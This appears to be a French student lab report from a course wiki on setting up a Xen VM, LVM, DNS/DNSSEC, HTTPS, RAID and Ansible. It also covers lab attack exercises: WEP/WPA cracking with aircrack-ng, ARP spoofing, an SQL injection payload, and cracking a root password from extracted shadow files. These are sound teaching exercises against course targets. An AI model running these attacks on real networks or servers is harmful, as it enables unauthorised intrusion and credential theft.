  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Afin de recevoir les mails nous ajoutons aussi la ligne suivante au fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
==Configuration d'apache2==&lt;br /&gt;
Une fois le CSR signé nous devons configurer apache 2 pour gérer du HTTPS sur le port 443.&lt;br /&gt;
&lt;br /&gt;
On commence par l'installer :&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
puis on active le module ssl :&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le fichier /etc/apache2/sites-enabled/000-default.conf pour rediriger le traffic http du port 80 vers le port 443 :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName www.stropharia.site&lt;br /&gt;
         '''Redirect / https://www.stropharia.site'''&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html&lt;br /&gt;
         ...&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et configurer les mots clés SSLCertificateKeyFile, SSLCertificateFile et SSLCertificateChainFile pour la connection sécurisé selon l'énoncé :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost _default_:443&amp;gt;                                                     &lt;br /&gt;
   ServerName www.stropharia.site                                                &lt;br /&gt;
   DocumentRoot /var/www/html                                                    &lt;br /&gt;
   SSLEngine On                                                                  &lt;br /&gt;
   '''SSLCertificateFile''' /etc/ssl/stropharia.site.crt                               &lt;br /&gt;
   '''SSLCertificateKeyFile''' /etc/ssl/stropharia.site.key                            &lt;br /&gt;
   '''SSLCertificateChainFile''' /etc/ssl/GandiStandardSSLCA2.pem&lt;br /&gt;
   SSLVerifyClient None                                                          &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons également un record dans le fichier /etc/bind/db.stropharia.site pour définir www.stropharia.site :&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On rédémarre le service apache&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
et l'on vérifie en allant sur www.stropharia.site que nous somme bien redirigés sur le site https avec un certificat valide. (capture en haut de la section)&lt;br /&gt;
&lt;br /&gt;
=4.4  Sécurisation de serveur DNS par DNSSEC=&lt;br /&gt;
&lt;br /&gt;
Nous suivons à la lettre les 9 étapes de la procédure de l'ennoncé 4.4 : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau004.html.&lt;br /&gt;
&lt;br /&gt;
De ce fait, après avoir généré nos clé, signé la zone et communiqué la partie publique de la clé KSK nous vérifions le résultat avec le site https://dnssec-analyzer.verisignlabs.com/ :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dns_stropharia.png]]&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55165</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55165"/>
				<updated>2020-12-22T00:50:15Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration d'apache2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
